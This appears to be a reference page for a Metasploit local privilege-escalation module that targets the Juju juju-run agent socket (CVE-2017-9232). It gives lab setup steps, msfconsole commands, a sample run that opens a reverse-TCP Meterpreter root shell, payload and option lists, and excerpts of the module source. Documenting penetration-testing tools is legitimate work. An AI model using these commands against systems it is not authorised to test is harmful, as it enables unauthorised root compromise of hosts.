Juju-run Agent Privilege Escalation - Metasploit


This page contains detailed information about how to use the exploit/linux/local/juju_run_agent_priv_esc metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Juju-run Agent Privilege Escalation
Module: exploit/linux/local/juju_run_agent_priv_esc
Source code: modules/exploits/linux/local/juju_run_agent_priv_esc.rb
Disclosure date: 2017-04-13
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): x86, x64
Supported platform(s): Linux
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2017-9232

This module attempts to gain root privileges on Juju agent systems running the juju-run agent utility. Juju agent systems running agent tools prior to version 1.25.12, 2.0.x before 2.0.4, and 2.1.x before 2.1.3, provide a UNIX domain socket to manage software ("units") without setting appropriate permissions, allowing unprivileged local users to execute arbitrary commands as root. This module has been tested successfully with Juju agent tools versions 1.18.4, 1.25.5 and 1.25.9 on Ubuntu 14.04.1 LTS x86 deployed by Juju 1.18.1-trusty-amd64 and 1.25.6-trusty-amd64 on Ubuntu 14.04.1 LTS x86_64.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Basic Usage


Note: To run a local exploit, make sure you are at the msf prompt. Also, to check the session ID, use the sessions command.

msf > use exploit/linux/local/juju_run_agent_priv_esc
msf exploit(juju_run_agent_priv_esc) > show targets
    ... a list of targets ...
msf exploit(juju_run_agent_priv_esc) > set TARGET target-id
msf exploit(juju_run_agent_priv_esc) > show options
    ... show and set options ...
msf exploit(juju_run_agent_priv_esc) > set SESSION session-id
msf exploit(juju_run_agent_priv_esc) > exploit

Required Options


  • SESSION: The session to run this module on.

Knowledge Base


Vulnerable Application


Description

This module attempts to gain root privileges on Juju agent systems running the juju-run agent utility.

Juju agent systems running agent tools prior to version 1.25.12, 2.0.x before 2.0.4, and 2.1.x before 2.1.3, provide a UNIX domain socket to manage software ("units") without setting appropriate permissions, allowing unprivileged local users to execute arbitrary commands as root.

Juju is an open source application modeling tool designed for devops to deploy, configure, scale, and operate software on public and private clouds.

  • Homepage: https://juju.ubuntu.com/
  • Github: https://github.com/juju/juju

This module has been tested successfully with Juju agent tools:

  • Versions 1.18.4, 1.25.5 and 1.25.9 on Ubuntu 14.04.1 LTS x86

Deployed by Juju:

  • Versions 1.18.1-trusty-amd64 and 1.25.6-trusty-amd64 on Ubuntu 14.04.1 LTS x86_64

Installation

Two systems are required. The first runs Juju and the second runs the Juju agent tools.

Ensure the client system has SSH installed and network accessible.

The following installation instructions are for Ubuntu 14.04.1 LTS ("trusty").

  # List avilable juju packages
  apt-cache showpkg juju

  # Install a vulnerable package
  apt-get install juju-core=1.18.1-0ubuntu1

  # Generate a config file
  juju init

Edit the manual section of the newly generated config file, adding the appropriate bootstrap-host and bootstrap-user for the client system, ensuring the appropriate default-series is set (trusty for Ububtu 14.x).

  manual:
    bootstrap-host: juju-client.local # Remote host
    bootstrap-user: user              # User for SSH access
    default-series: trusty            # Remote host OS series

Switch to the manual environment and bootstrap the remote host specified above:

  juju switch manual
  juju bootstrap

Once the bootstrapping is complete, check if it was successful. You should see a machine with ID# 0:

  juju stat

Deploy any unit to the machine with ID# 0. Units can be found in the Juju store.

  juju deploy zabbix-agent --to 0

Check if it worked:

  watch juju stat

Optionally, to test various versions of the juju agent utilities, the juju tools can be updated remotely. (Note: Downgrading is more difficult.)

  # You may or may not need to `set-env` the upstream tools URL:
  juju set-env agent-metadata-url=https://streams.canonical.com/juju/tools
  juju set-env agent-stream=proposed

  # Be careful to select a version which exists, otherwise bad things will happen.
  juju upgrade-juju --version 1.25.2

Verification Steps


  1. Start msfconsole
  2. Get a session
  3. Do: use exploit/linux/local/juju_run_agent_priv_esc
  4. Do: set SESSION [SESSION]
  5. Do: check
  6. Do: run
  7. You should get a new root session

Options


SESSION

Which session to use, which can be viewed with sessions

WritableDir

A writable directory file system path. (default: /tmp)

Scenarios


  msf exploit(multi/handler) > use exploit/linux/local/juju_run_agent_priv_esc 
  msf exploit(linux/local/juju_run_agent_priv_esc) > set session 1
  session => 1
  msf exploit(linux/local/juju_run_agent_priv_esc) > run

  [!] SESSION may not be compatible with this module.
  [*] Started reverse TCP handler on 172.16.191.244:4444 
  [*] Trying 3 units...
  [+] Unit "unit-zabbix-agent-1" uses a privileged socket
  [*] Writing '/tmp/.tp9oGmPSvx' (207 bytes) ...
  [*] Sending stage (857352 bytes) to 172.16.191.130
  [*] Meterpreter session 2 opened (172.16.191.244:4444 -> 172.16.191.130:43760) at 2018-01-13 12:33:48 -0500
  [+] Deleted /tmp/.tp9oGmPSvx

  meterpreter > getuid
  Server username: uid=0, gid=0, euid=0, egid=0
  meterpreter > sysinfo
  Computer     : 172.16.191.130
  OS           : Ubuntu 14.04 (Linux 3.13.0-32-generic)
  Architecture : i686
  BuildTuple   : i486-linux-musl
  Meterpreter  : x86/linux

Go back to menu.

Msfconsole Usage


Here is how the linux/local/juju_run_agent_priv_esc exploit module looks in the msfconsole:

msf6 > use exploit/linux/local/juju_run_agent_priv_esc

[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/juju_run_agent_priv_esc) > show info

       Name: Juju-run Agent Privilege Escalation
     Module: exploit/linux/local/juju_run_agent_priv_esc
   Platform: Linux
       Arch: x86, x64
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2017-04-13

Provided by:
  Ryan Beisner
  David Ames ( <David Ames (@thedac)>
  bcoles <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   Auto

Check supported:
  Yes

Basic options:
  Name         Current Setting  Required  Description
  ----         ---------------  --------  -----------
  SESSION                       yes       The session to run this module on.
  UNIT                          no        A valid Juju unit name
  WritableDir  /tmp             yes       A directory where we can write files

Payload information:

Description:
  This module attempts to gain root privileges on Juju agent systems 
  running the juju-run agent utility. Juju agent systems running agent 
  tools prior to version 1.25.12, 2.0.x before 2.0.4, and 2.1.x before 
  2.1.3, provide a UNIX domain socket to manage software ("units") 
  without setting appropriate permissions, allowing unprivileged local 
  users to execute arbitrary commands as root. This module has been 
  tested successfully with Juju agent tools versions 1.18.4, 1.25.5 
  and 1.25.9 on Ubuntu 14.04.1 LTS x86 deployed by Juju 
  1.18.1-trusty-amd64 and 1.25.6-trusty-amd64 on Ubuntu 14.04.1 LTS 
  x86_64.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2017-9232
  http://www.securityfocus.com/bid/98737
  https://bugs.launchpad.net/juju/+bug/1682411

Module Options


This is a complete list of options available in the linux/local/juju_run_agent_priv_esc exploit:

msf6 exploit(linux/local/juju_run_agent_priv_esc) > show options

Module options (exploit/linux/local/juju_run_agent_priv_esc):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   SESSION                       yes       The session to run this module on.
   UNIT                          no        A valid Juju unit name
   WritableDir  /tmp             yes       A directory where we can write files

Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.204.3    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Auto

Advanced Options


Here is a complete list of advanced options supported by the linux/local/juju_run_agent_priv_esc exploit:

msf6 exploit(linux/local/juju_run_agent_priv_esc) > show advanced

Module advanced options (exploit/linux/local/juju_run_agent_priv_esc):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   ContextInformationFile                   no        The information file that contains context information
   DisablePayloadHandler   false            no        Disable the handler code for the selected payload
   EXE::Custom                              no        Use custom exe instead of automatically generating a payload exe
   EXE::EICAR              false            no        Generate an EICAR file instead of regular payload exe
   EXE::FallBack           false            no        Use the default template in case the specified one is missing
   EXE::Inject             false            no        Set to preserve the original EXE function
   EXE::OldMethod          false            no        Set to use the substitution EXE generation method.
   EXE::Path                                no        The directory in which to look for the executable template
   EXE::Template                            no        The executable template file name.
   EnableContextEncoding   false            no        Use transient context when encoding payloads
   FileDropperDelay                         no        Delay in seconds before attempting cleanup
   MSI::Custom                              no        Use custom msi instead of automatically generating a payload msi
   MSI::EICAR              false            no        Generate an EICAR file instead of regular payload msi
   MSI::Path                                no        The directory in which to look for the msi template
   MSI::Template                            no        The msi template file name
   MSI::UAC                false            no        Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
   VERBOSE                 false            no        Enable detailed status messages
   WORKSPACE                                no        Specify the workspace for this module
   WfsDelay                2                no        Additional delay in seconds to wait for a session

Payload advanced options (linux/x64/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AppendExit                   false            no        Append a stub that executes the exit(0) system call
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   MeterpreterDebugLevel        0                yes       Set debug level for meterpreter 0-3 (Default output is strerr)
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   PrependChrootBreak           false            no        Prepend a stub that will break out of a chroot (includes setreuid to root)
   PrependFork                  false            no        Prepend a stub that starts the payload in its own process via fork
   PrependSetgid                false            no        Prepend a stub that executes the setgid(0) system call
   PrependSetregid              false            no        Prepend a stub that executes the setregid(0, 0) system call
   PrependSetresgid             false            no        Prepend a stub that executes the setresgid(0, 0, 0) system call
   PrependSetresuid             false            no        Prepend a stub that executes the setresuid(0, 0, 0) system call
   PrependSetreuid              false            no        Prepend a stub that executes the setreuid(0, 0) system call
   PrependSetuid                false            no        Prepend a stub that executes the setuid(0) system call
   RemoteMeterpreterDebugFile                    no        Redirect Debug Info to a Log File
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the linux/local/juju_run_agent_priv_esc module can exploit:

msf6 exploit(linux/local/juju_run_agent_priv_esc) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Auto

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the linux/local/juju_run_agent_priv_esc exploit:

msf6 exploit(linux/local/juju_run_agent_priv_esc) > show payloads

Compatible Payloads
===================

   #   Name                                              Disclosure Date  Rank    Check  Description
   -   ----                                              ---------------  ----    -----  -----------
   0   payload/generic/custom                                             normal  No     Custom Payload
   1   payload/generic/debug_trap                                         normal  No     Generic x86 Debug Trap
   2   payload/generic/shell_bind_tcp                                     normal  No     Generic Command Shell, Bind TCP Inline
   3   payload/generic/shell_reverse_tcp                                  normal  No     Generic Command Shell, Reverse TCP Inline
   4   payload/generic/tight_loop                                         normal  No     Generic x86 Tight Loop
   5   payload/linux/x64/exec                                             normal  No     Linux Execute Command
   6   payload/linux/x64/meterpreter/bind_tcp                             normal  No     Linux Mettle x64, Bind TCP Stager
   7   payload/linux/x64/meterpreter/reverse_tcp                          normal  No     Linux Mettle x64, Reverse TCP Stager
   8   payload/linux/x64/meterpreter_reverse_http                         normal  No     Linux Meterpreter, Reverse HTTP Inline
   9   payload/linux/x64/meterpreter_reverse_https                        normal  No     Linux Meterpreter, Reverse HTTPS Inline
   10  payload/linux/x64/meterpreter_reverse_tcp                          normal  No     Linux Meterpreter, Reverse TCP Inline
   11  payload/linux/x64/shell/bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Stager
   12  payload/linux/x64/shell/reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Stager
   13  payload/linux/x64/shell_bind_ipv6_tcp                              normal  No     Linux x64 Command Shell, Bind TCP Inline (IPv6)
   14  payload/linux/x64/shell_bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Inline
   15  payload/linux/x64/shell_bind_tcp_random_port                       normal  No     Linux Command Shell, Bind TCP Random Port Inline
   16  payload/linux/x64/shell_reverse_ipv6_tcp                           normal  No     Linux x64 Command Shell, Reverse TCP Inline (IPv6)
   17  payload/linux/x64/shell_reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Inline
   18  payload/linux/x86/chmod                                            normal  No     Linux Chmod
   19  payload/linux/x86/exec                                             normal  No     Linux Execute Command
   20  payload/linux/x86/meterpreter/bind_ipv6_tcp                        normal  No     Linux Mettle x86, Bind IPv6 TCP Stager (Linux x86)
   21  payload/linux/x86/meterpreter/bind_ipv6_tcp_uuid                   normal  No     Linux Mettle x86, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   22  payload/linux/x86/meterpreter/bind_nonx_tcp                        normal  No     Linux Mettle x86, Bind TCP Stager
   23  payload/linux/x86/meterpreter/bind_tcp                             normal  No     Linux Mettle x86, Bind TCP Stager (Linux x86)
   24  payload/linux/x86/meterpreter/bind_tcp_uuid                        normal  No     Linux Mettle x86, Bind TCP Stager with UUID Support (Linux x86)
   25  payload/linux/x86/meterpreter/reverse_ipv6_tcp                     normal  No     Linux Mettle x86, Reverse TCP Stager (IPv6)
   26  payload/linux/x86/meterpreter/reverse_nonx_tcp                     normal  No     Linux Mettle x86, Reverse TCP Stager
   27  payload/linux/x86/meterpreter/reverse_tcp                          normal  No     Linux Mettle x86, Reverse TCP Stager
   28  payload/linux/x86/meterpreter/reverse_tcp_uuid                     normal  No     Linux Mettle x86, Reverse TCP Stager
   29  payload/linux/x86/meterpreter_reverse_http                         normal  No     Linux Meterpreter, Reverse HTTP Inline
   30  payload/linux/x86/meterpreter_reverse_https                        normal  No     Linux Meterpreter, Reverse HTTPS Inline
   31  payload/linux/x86/meterpreter_reverse_tcp                          normal  No     Linux Meterpreter, Reverse TCP Inline
   32  payload/linux/x86/metsvc_bind_tcp                                  normal  No     Linux Meterpreter Service, Bind TCP
   33  payload/linux/x86/metsvc_reverse_tcp                               normal  No     Linux Meterpreter Service, Reverse TCP Inline
   34  payload/linux/x86/read_file                                        normal  No     Linux Read File
   35  payload/linux/x86/shell/bind_ipv6_tcp                              normal  No     Linux Command Shell, Bind IPv6 TCP Stager (Linux x86)
   36  payload/linux/x86/shell/bind_ipv6_tcp_uuid                         normal  No     Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   37  payload/linux/x86/shell/bind_nonx_tcp                              normal  No     Linux Command Shell, Bind TCP Stager
   38  payload/linux/x86/shell/bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Stager (Linux x86)
   39  payload/linux/x86/shell/bind_tcp_uuid                              normal  No     Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86)
   40  payload/linux/x86/shell/reverse_ipv6_tcp                           normal  No     Linux Command Shell, Reverse TCP Stager (IPv6)
   41  payload/linux/x86/shell/reverse_nonx_tcp                           normal  No     Linux Command Shell, Reverse TCP Stager
   42  payload/linux/x86/shell/reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Stager
   43  payload/linux/x86/shell/reverse_tcp_uuid                           normal  No     Linux Command Shell, Reverse TCP Stager
   44  payload/linux/x86/shell_bind_ipv6_tcp                              normal  No     Linux Command Shell, Bind TCP Inline (IPv6)
   45  payload/linux/x86/shell_bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Inline
   46  payload/linux/x86/shell_bind_tcp_random_port                       normal  No     Linux Command Shell, Bind TCP Random Port Inline
   47  payload/linux/x86/shell_reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Inline
   48  payload/linux/x86/shell_reverse_tcp_ipv6                           normal  No     Linux Command Shell, Reverse TCP Inline (IPv6)

Evasion Options


Here is the full list of possible evasion options supported by the linux/local/juju_run_agent_priv_esc exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(linux/local/juju_run_agent_priv_esc) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

juju-run is NOT installed


Here is a relevant code snippet related to the "juju-run is NOT installed" error message:

58:	    if juju_run_path.start_with? '/'
59:	      vprint_good 'juju-run is installed'
60:	      return CheckCode::Detected
61:	    end
62:	
63:	    vprint_error 'juju-run is NOT installed'
64:	
65:	    CheckCode::Safe
66:	  end
67:	
68:	  def unit_names

Target is not vulnerable


Here is a relevant code snippet related to the "Target is not vulnerable" error message:

91:	    register_file_for_cleanup path
92:	  end
93:	
94:	  def exploit
95:	    if check != CheckCode::Detected
96:	      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
97:	    end
98:	
99:	    units = datastore['UNIT'].blank? ? unit_names : [ datastore['UNIT'] ]
100:	
101:	    if units.empty?

Could not find any Juju units. Try specifying a 'UNIT'


Here is a relevant code snippet related to the "Could not find any Juju units. Try specifying a 'UNIT'" error message:

97:	    end
98:	
99:	    units = datastore['UNIT'].blank? ? unit_names : [ datastore['UNIT'] ]
100:	
101:	    if units.empty?
102:	      fail_with Failure::Unknown, "Could not find any Juju units. Try specifying a 'UNIT'"
103:	    end
104:	
105:	    # Check each unit for a privileged socket
106:	    print_status "Trying #{units.size} units..."
107:	

Could not find any Juju units using a privileged socket


Here is a relevant code snippet related to the "Could not find any Juju units using a privileged socket" error message:

115:	        break
116:	      end
117:	    end
118:	
119:	    if socket_unit.nil?
120:	      fail_with Failure::NotVulnerable, 'Could not find any Juju units using a privileged socket'
121:	    end
122:	
123:	    # Upload payload executable
124:	    payload_name = ".#{rand_text_alphanumeric rand(5..10)}"
125:	    payload_path = "#{datastore['WritableDir']}/#{payload_name}"

Go back to menu.


References


See Also


Check also the following modules related to this module:

Related Nessus plugins:

Authors


  • Ryan Beisner
  • David Ames (@thedac)
  • bcoles

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.